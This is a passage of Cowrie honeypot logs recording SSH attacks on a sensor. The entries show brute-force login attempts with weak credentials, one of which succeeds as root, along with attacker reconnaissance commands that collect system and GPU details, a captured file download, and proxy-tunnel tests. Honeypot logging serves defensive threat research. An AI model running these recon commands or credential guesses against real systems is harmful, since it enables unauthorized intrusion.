\t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.694906Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.695782Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.697009Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.698648Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.699726Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.700680Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.702471Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.703228Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.703799Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.704338Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.705007Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.705634Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.861027Z","src_ip":"212.227.235.229","session":"59c9c901c6d3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:54:11.290326Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:11.291246Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:11.292119Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:11.586936Z","src_ip":"212.227.125.160","session":"935762140a58"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"12345","message":"login attempt [ftp/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:12.670054Z","src_ip":"212.227.125.160","session":"935762140a58"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:13.752356Z","src_ip":"212.227.125.160","session":"935762140a58"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"abc123","message":"login attempt [ftp/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:14.835858Z","src_ip":"212.227.125.160","session":"935762140a58"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:15.919633Z","src_ip":"212.227.125.160","session":"935762140a58"}
{"eventid":"cowrie.session.closed","duration":29.855995655059814,"message":"Connection lost after 29 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:18.129289Z","src_ip":"212.227.125.160","session":"cde00313e218"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35196,"dst_ip":"1.2.3.4","dst_port":22,"session":"db070f0b4da8","protocol":"ssh","message":"New connection: 212.227.235.229:35196 (1.2.3.4:22) [session: db070f0b4da8]","sensor":"my-vps","timestamp":"2025-08-31T04:54:21.030723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:54:21.157782Z","src_ip":"212.227.235.229","session":"db070f0b4da8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:54:21.319596Z","src_ip":"212.227.235.229","session":"db070f0b4da8"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:22.853991Z","src_ip":"212.227.235.229","session":"db070f0b4da8"}
{"eventid":"cowrie.session.closed","duration":"71.0","message":"Connection lost after 71.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:23.376739Z","src_ip":"212.227.125.160","session":"633299299561"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:24.118526Z","src_ip":"212.227.235.229","session":"db070f0b4da8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53190,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7471e8653d5","protocol":"ssh","message":"New connection: 212.227.235.229:53190 (1.2.3.4:22) [session: a7471e8653d5]","sensor":"my-vps","timestamp":"2025-08-31T04:54:35.307386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:54:35.581344Z","src_ip":"212.227.235.229","session":"a7471e8653d5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:54:35.739535Z","src_ip":"212.227.235.229","session":"a7471e8653d5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44863,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7150a372ed6","protocol":"ssh","message":"New connection: 77.83.207.83:44863 (1.2.3.4:22) [session: f7150a372ed6]","sensor":"my-vps","timestamp":"2025-08-31T04:54:36.516586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:54:36.517401Z","src_ip":"77.83.207.83","session":"f7150a372ed6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T04:54:36.569495Z","src_ip":"77.83.207.83","session":"f7150a372ed6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:54:36.828206Z","src_ip":"77.83.207.83","session":"f7150a372ed6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2795,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2795","sensor":"my-vps","timestamp":"2025-08-31T04:54:36.881858Z","session":"f7150a372ed6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:54:36.933905Z","src_ip":"77.83.207.83","session":"f7150a372ed6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":19295,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:19295","sensor":"my-vps","timestamp":"2025-08-31T04:54:37.078508Z","session":"f7150a372ed6"}
{"eventid":"cowrie.login.failed","username":"ace","password":"ace","message":"login attempt [ace/ace] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:37.124634Z","src_ip":"212.227.235.229","session":"a7471e8653d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:54:37.130545Z","src_ip":"77.83.207.83","session":"f7150a372ed6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":18894,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18894","sensor":"my-vps","timestamp":"2025-08-31T04:54:37.274359Z","session":"f7150a372ed6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:54:37.326395Z","src_ip":"77.83.207.83","session":"f7150a372ed6"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:37.379462Z","src_ip":"77.83.207.83","session":"f7150a372ed6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36010,"dst_ip":"1.2.3.4","dst_port":22,"session":"07b026a63423","protocol":"ssh","message":"New connection: 212.227.235.229:36010 (1.2.3.4:22) [session: 07b026a63423]","sensor":"my-vps","timestamp":"2025-08-31T04:54:37.517533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:54:37.942506Z","src_ip":"212.227.235.229","session":"07b026a63423"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:54:38.008483Z","src_ip":"212.227.235.229","session":"07b026a63423"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:39.640631Z","src_ip":"212.227.235.229","session":"a7471e8653d5"}
{"eventid":"cowrie.login.failed","username":"mms","password":"mms","message":"login attempt [mms/mms] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:40.382966Z","src_ip":"212.227.235.229","session":"07b026a63423"}
{"eventid":"cowrie.session.closed","duration":"32.3","message":"Connection lost after 32.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:40.626756Z","src_ip":"212.227.125.160","session":"d4c3c5f4567b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52724,"dst_ip":"1.2.3.4","dst_port":22,"session":"be4d4a2deab5","protocol":"ssh","message":"New connection: 212.227.235.229:52724 (1.2.3.4:22) [session: be4d4a2deab5]","sensor":"my-vps","timestamp":"2025-08-31T04:54:40.956081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:54:40.956754Z","src_ip":"212.227.235.229","session":"be4d4a2deab5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:54:41.081383Z","src_ip":"212.227.235.229","session":"be4d4a2deab5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57836,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab895dbb7108","protocol":"ssh","message":"New connection: 212.227.125.160:57836 (1.2.3.4:22) [session: ab895dbb7108]","sensor":"my-vps","timestamp":"2025-08-31T04:54:41.413268Z"}
